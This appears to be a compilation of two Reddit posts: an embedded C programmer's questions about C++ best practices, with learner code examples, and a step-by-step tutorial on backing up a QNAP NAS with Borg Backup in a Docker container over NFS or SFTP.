C++ Best Practices for a C Programmer

Hi all,
Long time C programmer here, primarily working in the embedded industry (particularly involving safety-critical code). I've been a lurker on this sub for a while but I'm hoping to ask some questions regarding best practices. I've been trying to start using C++ in a lot of my work, particularly taking advantage of the code reuse and power of C++ (constexpr, some loose template programming, stronger type checking, RAII, etc.).
I would consider myself maybe an 8/10 C programmer, but I would conservatively rate myself 3/10 in C++ (with 1/10 meaning the absolute minimum ability to write, google syntax errata, diagnose, and debug a program). Perhaps I should preface the post by saying that I am more than aware that C is by no means a subset of C++ and there are many language constructs permitted in one that are not in the other.
In any case, I was hoping to get a few answers regarding best practices for C++. Keep in mind that the typical target device I work with does not have a heap of any sort, so a lot of the features that constitute "modern" C++ (non-initialization use of dynamic memory, STL meta-programming, hash maps, lambdas (as I currently understand them)) are a big no-no in terms of passing safety review.

When do I overload operators inside a class as opposed to outside?

... And what are the arguments for/against each paradigm? See below:
/* Overload example 1 (overloaded inside class) */
class myclass
{
private:
    unsigned int a;
    unsigned int b;

public:
    myclass(void);
    unsigned int get_a(void) const;
    bool operator==(const myclass &rhs);
};

bool myclass::operator==(const myclass &rhs)
{
    if (this == &rhs)
    {
        return true;
    }
    else
    {
        if (this->a == rhs.a && this->b == rhs.b)
        {
            return true;
        }
    }
    return false;
}
As opposed to this:
/* Overload example 2 (overloaded outside of class) */
class CD
{
private:
    unsigned int c;
    unsigned int d;

public:
    CD(unsigned int _c, unsigned int _d) : d(_d), c(_c) {}; /* CTOR */
    unsigned int get_c(void) const; /* trivial getters */
    unsigned int get_d(void) const; /* trivial getters */
};

/* In this implementation, if I don't make the getters (get_c, get_d) const,
 * it won't compile despite their access specifiers being public.
 *
 * It seems like the const keyword in C++ really should be interpreted as
 * "read-only AND no side effects" rather than just read-only as in C.
 * But my current understanding may just be flawed...
 *
 * My confusion is as follows: The function args are constant references,
 * so why do I have to promise that the member functions have no side effects on
 * the private object members? Is this something specific to the == operator? */
bool operator==(const CD &lhs, const CD &rhs)
{
    if (&lhs == &rhs)
        return true;
    else if ((lhs.get_c() == rhs.get_c()) && (lhs.get_d() == rhs.get_d()))
        return true;
    return false;
}
When should I use the example 1 style over the example 2 style? What are the pros and cons of 1 vs 2?
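To make the question concrete, here is a minimal sketch of the asymmetry I think is at stake (Meters is an invented type): with an implicit converting constructor in play, a free-function operator== lets conversions apply to both operands, while a member overload only converts the right-hand side.

class Meters
{
private:
    unsigned int value;

public:
    Meters(unsigned int v) : value(v) {} /* implicit conversion from unsigned int */
    unsigned int get(void) const { return value; }
};

bool operator==(const Meters &lhs, const Meters &rhs)
{
    return lhs.get() == rhs.get();
}

/* Both of these compile with the non-member overload:
 *   Meters m(5);
 *   (void)(m == 5u);   // rhs converted via Meters(unsigned int)
 *   (void)(5u == m);   // lhs converted too; a member operator== would reject this
 */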

What's the deal with const member functions?

This is more of a subtle confusion, but it seems like in C++ the const keyword means different things based on the context in which it is used. I'm trying to develop a relatively nuanced understanding of what's happening under the hood, and I have most certainly misunderstood many language features, especially because C++ has likely changed greatly in the last ~6-8 years.
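For concreteness, here's a tiny example (Reg is a made-up class) of the behavior I mean: if I've understood it correctly, the trailing const is a promise about *this, and the compiler enforces it whenever the object is reached through a const path, which would explain why the getters in example 2 had to be const to be callable on a const CD reference.

class Reg
{
private:
    unsigned int raw;

public:
    Reg(void) : raw(0) {}
    unsigned int read(void) const { return raw; } /* callable through const access paths */
    void write(unsigned int v) { raw = v; }       /* requires a non-const object */
};

void observe(const Reg &r)
{
    (void)r.read();   /* OK: read() promises not to modify *this */
    /* r.write(1); */ /* error: write() is not const and r is const */
}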

When should I use enum classes versus plain old enum?

To be honest I'm not entirely certain I fully understand the implications of using enum versus enum class in C++.
This is made more confusing by the fact that there are subtle differences between the way C and C++ treat or permit various language constructs (const, enum, typedef, struct, void*, pointer aliasing, type punning, tentative declarations).
In C, enums decay to integer values at compile time. But in C++, the way I currently understand it, enums are their own type. Thus, in C, the following code would be valid, but a C++ compiler would generate a warning (or an error; I haven't actually tested it):
/* Example 3: (enums : Valid in C, invalid in C++) */
enum COLOR
{
    RED,
    BLUE,
    GREY
};

enum PET
{
    CAT,
    DOG,
    FROG
};

/* This is compatible with a C-style enum conception but not C++ */
enum SHAPE
{
    BALL = RED, /* In C, these work because int = int is valid */
    CUBE = DOG,
};
If my understanding is indeed the case, do enums have an implicit namespace (the language construct, not the C++ keyword) as in C? As an add-on to that, in C++ you can also declare enums with a sort of inherited underlying type (below). What am I supposed to make of this? Should I just be using it to reduce code size when possible (similar to the gcc option -fshort-enums)? Since most processors are word based, would it be more performant to use the processor's word type than the syntax specified above?
/* Example 4: (Purely C++ style enums, use of enum class / enum struct) */

/* C++ permits forward enum declaration with type specified */
enum FRUIT : int;
enum VEGGIE : short;

enum FRUIT : int /* As I understand it, these are ints */
{
    APPLE,
    ORANGE,
};

enum VEGGIE : short /* As I understand it, these are shorts */
{
    CARROT,
    TURNIP,
};
Complicating things even further, I've also seen the following syntax:
/* What the heck is an enum class anyway? When should I use them? */
enum class THING
{
    THING1,
    THING2,
    THING3
};

/* And if classes and structs are interchangeable (minus assumptions
 * about default access specifiers), what does that mean for
 * the following definition? */
enum struct FOO /* Is this even valid syntax? */
{
    FOO1,
    FOO2,
    FOO3
};
Given that enumerated types greatly improve code readability, I've been trying to wrap my head around all this. When should I be using the various language constructs? Are there any pitfalls in a given method?
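For my own notes, here's the toy example I've been using to test my understanding (names invented): as far as I can tell, enum struct is exactly equivalent to enum class, and the scoped variants neither leak their enumerators into the enclosing scope nor convert implicitly.

enum WEEKDAY { MON, TUE };                /* unscoped: MON lands in the enclosing scope */
enum class MONTH { JAN, FEB };            /* scoped: must be written MONTH::JAN */

void enum_demo(void)
{
    int i = MON;                          /* OK: unscoped enums convert to int */
    /* int j = MONTH::JAN; */             /* error: scoped enums don't implicitly convert */
    int k = static_cast<int>(MONTH::FEB); /* explicit conversion required */
    MONTH m = MONTH::JAN;
    (void)i; (void)k; (void)m;
}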

When to use POD structs (a-la C style) versus a class implementation?

If I had to take a stab at answering this question, my intuition would be to use POD structs for passing aggregate types (as in function arguments) and to use classes for interface abstractions / object abstractions, as in the example below:
struct aggregate
{
    unsigned int related_stuff1;
    unsigned int related_stuff2;
    char name_of_the_related_stuff[20];
};

class abstraction
{
private:
    unsigned int private_member1;
    unsigned int private_member2;

protected:
    unsigned int stuff_for_child_classes;

public:
    /* big 3 */
    abstraction(void);
    abstraction(const abstraction &other);
    ~abstraction(void);

    /* COPY semantic (I have a better grasp on this abstraction than MOVE) */
    abstraction &operator=(const abstraction &rhs);

    /* MOVE semantic (subtle semantics of which I don't fully grasp yet) */
    abstraction &operator=(abstraction &&rhs);

    /*
     * I've seen implementations of this that use a copy + swap design pattern,
     * but that relies on std::move and I realllllly don't get what is
     * happening under the hood in std::move
     */
    abstraction &operator=(abstraction rhs);

    void do_some_stuff(void); /* member function */
};
Is there an accepted best practice for this, or is it entirely preference? Are there arguments for only using classes? And what about vtables, in cases like device register overlays where I have to guarantee byte-wise alignment and the precise placement of members?
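To pin down the vtable worry, this is the compile-time check I'd reach for (a sketch; uart_regs is a made-up overlay type): a type with no virtual functions carries no vtable pointer, and standard-layout can be asserted before trusting a register overlay.

#include <type_traits>

struct uart_regs                  /* hypothetical device register overlay */
{
    volatile unsigned int data;
    volatile unsigned int status;
};

static_assert(std::is_standard_layout<uart_regs>::value,
              "C-compatible layout; safe to place at a fixed address");

struct has_vtable
{
    virtual void f(void) {}       /* first virtual function introduces the vptr */
};

static_assert(!std::is_standard_layout<has_vtable>::value,
              "polymorphic types are not standard-layout");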

Is there a best practice for integrating C code?

Typically (and up to this point), I've just done the following:
/* Example 5 : Linking a C library */
/* Disable name-mangling, and then give the C++ linker /
 * toolchain the compiled binaries */
#ifdef __cplusplus
extern "C" {
#endif /* C linkage */

#include "device_driver_header_or_a_c_library.h"

#ifdef __cplusplus
}
#endif /* C linkage */

/* C++ code goes here */
As far as I know, this is the only way to prevent the C++ compiler from generating different object symbols than those in the C header file. Again, this may just be ignorance of C++ standards on my part.
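One variation I have seen in the wild (and would appreciate confirmation on): putting the guard inside the C header itself, so that C++ consumers can include it directly without wrapping it. The driver_init below is a made-up C function, purely for illustration.

/* device_driver_header_or_a_c_library.h */
#ifdef __cplusplus
extern "C" {
#endif

void driver_init(void); /* hypothetical C API call */

#ifdef __cplusplus
}
#endif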

What is the proper way to selectively incorporate RTTI without code size bloat?

Is there even a way? I'm relatively fluent in CMake, but I guess the underlying question is whether binaries that incorporate RTTI are compatible with those that don't (and what pitfalls may ensue when mixing the two).
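For reference, my current understanding (corrections welcome) is that the mainstream toolchains only offer a per-translation-unit switch rather than anything selective: GCC/Clang's -fno-rtti disables typeid and runtime-checked dynamic_cast outright, so any downcast has to become an unchecked static_cast. A sketch of what I mean (base/derived/get_base are invented for illustration):

struct base { virtual ~base() {} };
struct derived : base { };

base *get_base(void) { return 0; } /* stand-in definition for the sketch */

void probe(void)
{
    /* derived *d = dynamic_cast<derived *>(get_base()); */ /* rejected under -fno-rtti */
    derived *d = static_cast<derived *>(get_base());        /* compiles, but unchecked */
    (void)d;
}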

What about compile time string formatting?

One of my biggest gripes about C (particularly regarding string manipulation) is that variadic arguments get handled at runtime, especially on embedded targets. This makes string manipulation via the C standard library (printf-style format strings) uncomputable at compile time in C.
This is sadly the case even when the ranges and values of parameters and formatting outputs are entirely known beforehand. C++ template programming seems to be a big thing in "modern" C++, and I've seen a few projects on this sub that use the Turing-completeness of the template system to do some crazy things at compile time. Is there a way to bypass this ABI limitation using C++ features like constexpr, templates, and lambdas? My (somewhat pessimistic) suspicion is that since the generated assembly must be ABI-compliant, this isn't possible. Is there a way around this? What about the std::format stuff I've been seeing on this sub periodically?
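As a sanity check on what constexpr alone can already do (this assumes C++14 relaxed constexpr; count_specifiers is my own toy function), the scan below is forced to run entirely at compile time by the static_assert, which is the flavor of compile-time work I'm hoping std::format-style checking builds on.

constexpr unsigned count_specifiers(const char *fmt)
{
    unsigned n = 0;
    while (*fmt != '\0')
    {
        if (fmt[0] == '%' && fmt[1] == '%')
        {
            fmt += 2;  /* literal "%%" is not a conversion */
        }
        else if (fmt[0] == '%')
        {
            ++n;
            ++fmt;
        }
        else
        {
            ++fmt;
        }
    }
    return n;
}

static_assert(count_specifiers("addr=%x val=%u") == 2,
              "evaluated entirely at compile time, no runtime varargs involved");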

Is there a standard practice for namespaces and when to start incorporating them?

Is it from the start? Is it when the boundaries of a module become clearly defined? Or is it just personal preference / based on project scale and modularity?
If I had to make a guess, it would be at the point that you get a "build group" for a project (a group of source files that should be compiled together), as that would loosely define the boundaries of a series of abstractions/APIs you may provide to other parts of a project.
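If it helps anchor the question, this is the shape I'm imagining for one such "build group" (uart is an invented module name):

namespace uart
{
    void init(void);
    void send(const unsigned char *buf, unsigned int len);
}

/* call sites then read as uart::init() and uart::send(...),
 * which is roughly the module boundary I'd otherwise fake
 * with uart_ prefixes in C */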
--EDIT-- markdown formatting
submitted by aWildElectron to cpp


Tutorial: Using Borg for backup your QNAP to other devices (Advanced - CLI only)

This tutorial explains how to use Borg Backup to perform backups, specifically backups from your QNAP to another unit (another NAS on your LAN, an external hard drive, any off-site server, etc.). It is also a great tool for backing up your computers to your NAS. This tutorial is a little more technical than the previous one, so be patient :)
MASSIVE WALL OF TEXT AHEAD. You have been warned.
Why Borg instead of, let's say, HBS3? Well, Borg is one of the best -if not THE BEST- backup tools available. It is very resilient to failure and corruption. Personally, I'm in love with Borg. It is a command-line tool, which means there is no GUI available (there are a couple of front-ends created by the community, though). I know that can be very intimidating at first when you are not accustomed to it, and that it looks ugly, but honestly, it is not that complicated, and if you are willing to give it a try, I can assure you that it is simple and easy. You might even like it over time!
https://www.borgbackup.org/
That aside, I have found that HBS3 can only perform incremental backups when doing QNAP-to-QNAP backups. It can use Rsync to save files to a non-QNAP device, but then you can't use incremental backups (and IIRC, neither deduplication nor encryption). It will even refuse to save to a mounted folder using hybrid mount. QNAP seems to be trying to subtly lock you into their ecosystem. Borg has none of those limitations.

Main pros of Borg Backup:
- VERY efficient and powerful
- Space efficient thanks to deduplication and compression
- Allows encryption, deduplication, incremental, compression… you name it.
- Available in almost any OS (except Windows) and thanks to Docker, even in Windows. There are also ARM binaries, so it is Raspberry compatible, and even ARM based QNAPs that don’t support docker can use it!!!
- Since it’s available in most OS, you can use a single unified solution for all your backups.
- Can make backups in PUSH and PULL style. Either each machine with Borg pushes the files into the server, or a single server with Borg installed pulls the files from any device without needing to install Borg on those devices.
- It is backed by a huge community with tons of integration and wrapper tools (https://github.com/borgbackup/community)
- Supports Backup to local folders, LAN backups using NFS or SMB, and also remote backups using SFTP or mounting SSHFS.
- IT IS FOSS. Seriously, guys, whenever possible, choose FOSS.

Cons of Borg Backup:
- It is not tailored for backups to cloud services like Drive or Mega. You might want to take a look at Rclone or Restic for that.
- It lacks a GUI, so everything is CLI controlled. I know, it can be very intimidating, but once you have used it for a couple of days, you will notice how simple and comfortable it is to use.

The easiest way to run Borg is to just grab the appropriate prebuilt binary (https://github.com/borgbackup/borg/releases) and run it baremetal, but I’m going to show how to install Borg in a docker container so you can apply this solution to any other scenario where docker is available. If you want to skip the container creation, just proceed directly to step number 2.

**FIRST STEP: LET'S BUILD THE CONTAINER**
There is currently no official Borg prebuilt container (although there are non-official ones). Since it's a CLI tool, you don't really need a prebuilt container; you can just use your preferred one (Ubuntu, Debian, Alpine, etc.) and install Borg directly in your container. We are using an ubuntu:latest container because the available Borg version for Ubuntu is up to date. For convenience, all the directories we want to back up will be mounted inside the container in /output.
If you are already familiar with SSH and container creation through the CLI, just use this template, substituting your specific directory mounts.
docker run -it \
    --cap-add=NET_ADMIN \
    --net=bridge \
    --privileged \
    --cap-add SYS_ADMIN \
    --device /dev/fuse \
    --security-opt apparmor:unconfined \
    --name=borgbackup \
    -v /share/Movies:/output/Movies:ro \
    -v /share/Important/Documents:/output/Documents:ro \
    -v /share/Other:/output/Other:ro \
    -v /share/Container/borgbackup/persist:/persist \
    -v /etc/localtime:/etc/localtime:ro \
    ubuntu:latest
(REMEMBER: LINUX IS CASE-SENSITIVE, SO CAPITALS MATTER!!)
Directories to be backed up are mounted as read-only (:ro) for extra safety. I have also found that mounting another directory as a "persistent" directory makes it easy to create and edit the needed scripts directly from File Finder in QNAP, and also allows you to keep them in case you need to destroy or recreate the container: this is the "/persist" directory. Use your favorite path.
If you are not familiar with SSH, first go here to learn how to activate and login into your QNAP using SSH (https://www.qnap.com/en/how-to/knowledge-base/article/how-to-access-qnap-nas-by-ssh/).
You can also use the GUI in Container Station to create the container and mount folders in advanced tab during container creation. Please, refer to QNAP’s tutorials about Docker.
GUI example
If done correctly, you will see that this container appears in the overview tab of Container Station. Click the name, and then click the two arrows. That will transport you to another tab inside the container to start working.
https://preview.redd.it/5y09skuxrvj41.jpg?width=1440&format=pjpg&auto=webp&s=19e4b22d6458d2c9a8143c9841f070828bcf5170

**SECOND STEP: INSTALLING BORG BACKUP INSIDE THE CONTAINER**
First, check that the directory with all the data you want to back up (/output in our example) is mounted. If you can't see anything, then you did something wrong in the first step when creating the container. If so, delete the container and try again. Now navigate to /persist using "cd /persist".
See how /output contains the to-be-backed-up directories
Now, we are going to update ubuntu and install some dependencies and apps we need to work. Copy and paste this:
apt update && apt upgrade -y
apt install -y nano fuse software-properties-common nfs-common ssh
It will install a lot of things. Just let it work. When finished, install borgbackup using
add-apt-repository -y ppa:costamagnagianfranco/borgbackup
apt install -y borgbackup
When it’s finished, run “borg --version” and you will be shown the current installed version (at time of writing this current latest is 1.1.10). You already have Borg installed!!!!
1.1.10 is latest version at the time of this tutorial creation

**THIRD STEP: PREPARING THE BACKUP DEVICE USING NFS MOUNT**
Now, to init the repository, we first need to choose where we want to make the backup. Borg can easily make "local" backups to a local folder, but that defeats the purpose of backups, right? We want to create remote repositories.
If you are making backups to a local (same network) device (another NAS, a computer, etc.), then you can choose to use SFTP (SSH file transfer) or just NFS or SMB to mount a folder. If you want to back up to a remote repository outside your LAN (the internet), you HAVE to use SFTP or SSHFS. I'm explaining now how to mount a folder using NFS, leaving SFTP for later.
Borg can work in two different ways: PUSH style or PULL style.
In PUSH style, each unit to be backed up has Borg installed and "pushes" the files to a remote folder using NFS, SMB or SSHFS. The target unit does not need to have Borg installed.
PUSH style backup: The QNAP sends files to the backup device

In PULL style, the target unit that is going to receive the backups has Borg installed, and it "pulls" the files from the units to be backed up (so they don't need Borg installed) using NFS, SMB or SSHFS. This is great if you have a powerful NAS unit and want to back up several computers.
PULL style backup: The backup device gets files from QNAP. Useful for multiple unit backups into the same backup server.

When using SFTP, the backup unit has Borg installed, opens a secure SSH connection to the target unit, connects with Borg on the target machine, and uploads the files. In SFTP style, BOTH units need Borg installed.
SFTP: Borg needs to be installed on both devices, and they "talk" to each other.

I'm assuming you have another device with IP "192.168.1.200" (in my example I'm using a VM with that IP) with a folder called "/backup" inside. I'm also assuming that you have correctly authorized the NFS mount with read/write permissions between both devices. If you don't know how to, you'll need to investigate. (https://www.qnap.com/en-us/how-to/knowledge-base/article/how-to-enable-and-setup-host-access-for-nfs-connection/)
NFS mounting means mirroring two folders from two different devices. So, mounting folder B from device Y into folder A on device X means that even if folder B is "physically" stored on device Y, device X can use it exactly as if it were folder A inside its local path. If you write something to folder A, folder B will automatically be updated with that new file, and vice-versa.
Graphical example of what happens when mounting folders in Linux system.
Mount usage is: “mount [protocol] [targetIP]:/target/directory /local/directory” So, go to your container and write:
mount -t nfs 192.168.1.200:/backup /mnt 
"mount" is the command to mount. "-t nfs" means using NFS; if you want to use SMB, you would use "-t cifs". 192.168.1.200 is the IP of the device where you are going to make backups. /backup is the directory on the target we want to save our backups to (remember you need to correctly enable permissions for NFS server sharing on the target device). /mnt is the directory in the container where the /backup folder will be mounted.
OK, so now /mnt in the container = /backup on the target. If you drop a .txt file in one of those directories, it will immediately appear in the other. So... all we have to do now is make a Borg repository on /mnt and wildly start making backups. /mnt will be our working directory.

**FOURTH STEP: ACTUALLY USING BORG** (congrats if you made it here)
Read the documentation
https://borgbackup.readthedocs.io/en/stable/usage/general.html
It's madness, right? It's OK. In fact, we only need a few borg commands to make it work.
“borg init” creates a repository, that is, a place where the backup files are stored.
“borg create” makes a backup
“borg check” checks backup integrity
“borg prune” prunes the backup (deletes older files)
“borg extract” extract files from a backup
“borg mount” mounts a backup as if it was a directory and you can navigate it
“borg info” gives you info from the repository
“borg list” shows every backup inside the repository
But since we are later using pre-made scripts for backup, you will only need to actually use “init”, “info” and “list” and in case of recovery, “mount”.
Let's create our repository using INIT
https://borgbackup.readthedocs.io/en/stable/usage/init.html
borg init -e [encryption] [options] /mnt 
So, if you want to encrypt the repository with a password (highly recommended), use "-e repokey" or "-e repokey-blake2". If you want to use a keyfile instead, use "-e keyfile". If you don't want to encrypt, use "-e none". If you want to set a maximum space quota, use "--storage-quota <size>" to avoid excessive storage usage (e.g. "--storage-quota 500G" or "--storage-quota 2.5T"). Read the link above. OK, so in this example:
borg init -e repokey --storage-quota 200G /mnt
You will be asked for a password. Keep this password safe. If you lose it, you lose your backups!!!! Once finished, we have our repository ready to create the first backup. If you use "ls /mnt" you will see that the /mnt directory is no longer empty, but contains several files. Those are the repository files, and they should now also be present on your backup device.
init performed successfully
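Side note (this assumes a repokey or keyfile repository): right after init I also like to export a copy of the repository key, since losing the key material is as fatal as losing the password:

borg key export /mnt /persist/repokey.backup

Keep that exported file somewhere outside the repository itself.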
Let's talk about actually creating backups. Usually, you would create a backup with the "borg create" command, using something like this:
borg create -l -s /mnt::Backup01 /output --exclude '*.py'
https://borgbackup.readthedocs.io/en/stable/usage/create.html
That would create a backup archive called "Backup01" containing all files and directories in /output, but excluding every .py file. It will also list all files (-l) and stats (-s) during the process. If you later run the same command but with "Backup02", only newly added files will be saved (incremental), but deleted files will still be available in "Backup01". So as new backups are made, you will eventually run out of storage space. To avoid this, you need to schedule pruning.
https://borgbackup.readthedocs.io/en/stable/usage/prune.html
borg prune [options] [path/to/repo] is used to delete old backups based on your specified options (e.g. "keep the last 4 yearly backups, 1 backup per month for the last year, and 1 daily backup for the last month").
BUT. To make it simple, we just need to create a script that will automatically 1) create a new backup with a specified name and 2) run a prune with a specified retention policy.
Inside the container head to /persist using “cd /persist”, and create a file called backup.sh using
touch backup.sh
chmod 700 backup.sh
nano backup.sh
Then, copy the following and paste it inside nano using CTRL+V
#!/bin/sh

# Setting this, so the repo does not need to be given on the command line:
export BORG_REPO=/mnt

# Setting this, so you won't be asked for your repository passphrase:
export BORG_PASSPHRASE='YOURsecurePASS'
# or this to ask an external program to supply the passphrase:
# export BORG_PASSCOMMAND='pass show backup'

# some helpers and error handling:
info() { printf "\n%s %s\n\n" "$( date )" "$*" >&2; }
trap 'echo $( date ) Backup interrupted >&2; exit 2' INT TERM

info "Starting backup"

# Backup the most important directories into an archive named after
# the machine this script is currently running on:

borg create \
    --verbose \
    --filter AME \
    --list \
    --stats \
    --show-rc \
    --compression lz4 \
    --exclude-caches \
    --exclude '*@Recycle/*' \
    --exclude '*@Recently-Snapshot/*' \
    --exclude '*/.@__thumb/*' \
    ::'QNAP-{now}' \
    /output

backup_exit=$?

info "Pruning repository"

# Use the `prune` subcommand to maintain 7 daily, 4 weekly and 6 monthly
# archives of THIS machine. The 'QNAP-' prefix is very important to
# limit prune's operation to this machine's archives and not apply to
# other machines' archives also:

borg prune \
    --list \
    --prefix 'QNAP-' \
    --show-rc \
    --keep-daily 7 \
    --keep-weekly 4 \
    --keep-monthly 6

prune_exit=$?

# use highest exit code as global exit code
global_exit=$(( backup_exit > prune_exit ? backup_exit : prune_exit ))

if [ ${global_exit} -eq 0 ]; then
    info "Backup and Prune finished successfully"
elif [ ${global_exit} -eq 1 ]; then
    info "Backup and/or Prune finished with warnings"
else
    info "Backup and/or Prune finished with errors"
fi

exit ${global_exit}
This script seems very complicated, but all it does is
  1. Define the backup location
  2. Define backup parameters, inclusions and exclusions and run backup
  3. Define pruning policy and run prune
  4. Show stats
You can freely modify it using the options you need (they are described in the documentation).
“export BORG_REPO=/mnt” is where the repository is located.
"export BORG_PASSPHRASE='YOURsecurePASS'" is your repository password (between the single quotes).
After "borg create", some options are defined, like compression, file listing and stat display. Then exclusions are defined (each --exclude defines one exclusion rule; in this example I have defined rules to avoid backing up thumbnails, recycle bin files, and snapshots). If you wish to exclude more directories or files, add a new rule there.
::'QNAP-{now}' defines how backups will be named. Right now they will be named QNAP-"current date and time". In case you want only the current date and not the time, you can use this instead:
::'QNAP-{now:%Y-%m-%d}' \
Be aware that if you decide to do so, you will only be able to create a single backup each day, as subsequent backups on the same day will fail: Borg will find another backup with the same name and skip the current one.
/output below is the directory to be backed up.
And finally, the prune policy is at the end. This defines which backups will be kept and which ones will be deleted. The currently defined policy is to keep 7 end-of-day, 4 end-of-week and 6 end-of-month backups. Extra backups will be deleted. You can modify this depending on your needs. Follow the documentation for extra information and examples.
https://borgbackup.readthedocs.io/en/stable/usage/prune.html
Now save the script using CTRL+O. We are ready. Run the script using:
./backup.sh
It will show progress, including which files are being saved. After finishing, it will print the backup name (in this example "QNAP-2020-01-26T01:05:36" is the name of the backup archive) and stats, and will return two rc statuses, one for the backup and another for the pruning. "rc 0" means success. "rc 1" means finished, but with warnings. "rc 2" means failed. You should be returned two rc 0 statuses and the phrase "Backup and Prune finished successfully". Congrats.
Backup completed. rc 0=good. rc 2=bad
You can use any borg command manually against your repository as needed. For example:
borg list /mnt                               List your current backups inside the repository
borg list /mnt::QNAP-2020-01-26T01:05:36     List the contents of this specific backup
borg info /mnt                               List general stats of your repository
borg check -v --show-rc /mnt                 Performs an integrity check and returns the rc status (0, 1 or 2)
All that is left is to create the final run script and the cron job in our QNAP to automate backups. You can skip the next step, which describes the same process but using SFTP instead of NFS, and head directly to step number six.

**FIFTH STEP: THE SAME AS STEP 4, BUT USING SFTP INSTEAD**
If you want to perform backups to an off-site machine, like another NAS located elsewhere, then you can't use NFS or SMB, as they are not designed to be used over the internet and are not safe. We must use SFTP. SFTP is NOT FTP over SSL (that is FTPS); SFTP stands for Secure File Transfer Protocol, and it's based on SSH but for file transfer. It is secure, as everything is encrypted, but expect lower speed due to the encryption overhead. We first need to set up SSH on our target machine, so be sure to enable it. I also recommend using a non-standard port. In our example, we are using port 4000.
IMPORTANT NOTE: To use SFTP, Borg must be installed and runnable on the target machine. You can run it bare-metal, or use a container, just as on our QNAP, but if you really can't get Borg running on the target machine, then you cannot use SFTP. There is an alternative, though: SSHFS, which is basically NFS but over SSH. With it you can securely mount a folder over the internet. Read this documentation (https://www.digitalocean.com/community/tutorials/how-to-use-sshfs-to-mount-remote-file-systems-over-ssh) and go back to the Third Step once you have it working. SSHFS is not covered in this tutorial.
First, go to your target machine and create a new user (in our example this will be "targetuser").
Second, we need to create SSH keys so that both the original machine and the target one can establish an SSH connection without needing a password. It also greatly increases security. In our original container, run
ssh-keygen -t rsa 
When you are asked for a passphrase, just press enter (no passphrase). Your keys are now stored in ~/.ssh. To copy them to your target machine, use this:
ssh-copy-id -p 4000 targetuser@192.168.1.200
If that don’t work, this is an alternative command you can use:
cat ~/.ssh/id_rsa.pub | ssh -p 4000 targetuser@192.168.1.200 "mkdir -p ~/.ssh && chmod 700 ~/.ssh && cat >> ~/.ssh/authorized_keys"
You will be asked for the targetuser password when connecting. If you were successful, you can now SSH without a password into the target machine using "ssh -p 4000 targetuser@192.168.1.200". Try it now. If you get to log in without a password prompt, you got it right. If it still asks you for a password when SSH'ing, try repeating the last step or google a little about how to transfer SSH keys to the target machine.
Now that you are logged in to your target machine over SSH, install Borg if you didn't previously, create the backup folder (/backup in our example) and init the repository as shown in the Third Step.
borg init -e repokey --storage-quota 200G /backup
Once the repository is initialized, you can exit SSH using the "exit" command, and you will be back in your container. You know what comes next.
cd /persist
touch backup.sh
chmod 700 backup.sh
nano backup.sh
Now paste this inside:
#!/bin/sh

# Setting this, so the repo does not need to be given on the command line:
export BORG_REPO=ssh://targetuser@192.168.1.200:4000/backup

# Setting this, so you won't be asked for your repository passphrase:
export BORG_PASSPHRASE='YOURsecurePASS'
# or this to ask an external program to supply the passphrase:
# export BORG_PASSCOMMAND='pass show backup'

# some helpers and error handling:
info() { printf "\n%s %s\n\n" "$( date )" "$*" >&2; }
trap 'echo $( date ) Backup interrupted >&2; exit 2' INT TERM

info "Starting backup"

# Backup the most important directories into an archive named after
# the machine this script is currently running on:

borg create \
    --verbose \
    --filter AME \
    --list \
    --stats \
    --show-rc \
    --compression lz4 \
    --exclude-caches \
    --exclude '*@Recycle/*' \
    --exclude '*@Recently-Snapshot/*' \
    --exclude '*/.@__thumb/*' \
    ::'QNAP-{now}' \
    /output

backup_exit=$?

info "Pruning repository"

# Use the `prune` subcommand to maintain 7 daily, 4 weekly and 6 monthly
# archives of THIS machine. The 'QNAP-' prefix is very important to
# limit prune's operation to this machine's archives and not apply to
# other machines' archives also:

borg prune \
    --list \
    --prefix 'QNAP-' \
    --show-rc \
    --keep-daily 7 \
    --keep-weekly 4 \
    --keep-monthly 6

prune_exit=$?

# use highest exit code as global exit code
global_exit=$(( backup_exit > prune_exit ? backup_exit : prune_exit ))

if [ ${global_exit} -eq 0 ]; then
    info "Backup and Prune finished successfully"
elif [ ${global_exit} -eq 1 ]; then
    info "Backup and/or Prune finished with warnings"
else
    info "Backup and/or Prune finished with errors"
fi

exit ${global_exit}
CTRL+O to save, and CTRL+X to exit. OK, let’s do it.
./backup.sh 
It should connect and perform your backup correctly. Note that the only thing I modified from the script shown in the Fourth Step is the "BORG_REPO" line, which I changed from the local "/mnt" to a remote SSH URL with our target machine and user data.
Finally all that is left is to automate this.

**SIXTH STEP: AUTOMATING BACKUP**
The only problem is that containers can't retain mounts when they restart. That is not a problem if you are using SFTP, but in the case of NFS, we need to re-mount each time the container is started, and fstab does not work in a container. The easiest solution is to create a script called "start.sh":
cd /persist
mkdir log
touch start.sh
chmod 700 start.sh
nano start.sh
and inside just paste this:
#!/bin/bash
log="/persist/log/borg.log"
mount -t nfs 192.168.1.200:/backup /mnt
/persist/backup.sh 2>> $log
echo ==========FINISH========== >> $log
Save and try it. Stop the container, and start it again. If you use "ls /mnt" you will see that the repository is no longer there. That is because the mount point was unmounted when you stopped the container. Now run
/persist/start.sh 
When it's finished, a log file will appear inside /persist/log. It contains everything Borg was previously printing to the screen, and you can check it using
cat /persist/log/borg.log
Everything is ready. All we need to do is create a crontab job to run this script whenever we want. You can read here how to edit the crontab in QNAP (https://wiki.qnap.com/wiki/Add_items_to_crontab). Add this line to the crontab:
0 1 * * * docker start borgbackup && docker exec borgbackup /bin/bash -c "/persist/start.sh" && docker stop borgbackup
That will launch the container each day at 1:00 am, run the start.sh script, and stop the container when finished.

**EXTRA: RECOVERING OUR DATA**
In case you need to recover your data, you can use any device with Borg installed. There are two commands you can use: "borg extract" and "borg mount". "borg extract" will extract all files inside an archive into the current directory. "borg mount" will mount the repository so you can navigate it and pick the specific files you want to recover, much like NFS or SMB work.
Some examples:
borg extract /mnt::QNAP-2020-01-26T01-05-36 -> Extracts all files from this specific backup time point into the current directory
borg mount /mnt::QNAP-2020-01-26T01-05-36 /recover -> Mounts this specific backup time point inside the /recover directory so you can navigate and search the files inside
borg mount /mnt /recover -> Mounts all backup time points inside the /recover directory. You can navigate all time points and recover whatever you want
borg umount /recover -> Unmounts the repository from /recover

I know this is a somewhat complicated tutorial, and sincerely, I don't think there will be a lot of people interested, as Borg is for advanced users. That said, I had a ton of fun using Borg and creating this tutorial. I hope it can help some people. I am conscious that like 99% of this community's users do not need advanced features and would do great using HBS3... But TBH, I'm writing for that 1%.
Next up: I'm trying a Duplicati container that is supposed to have a GUI, so... maybe the next tutorial will be about a GUI-based backup tool. Who knows?
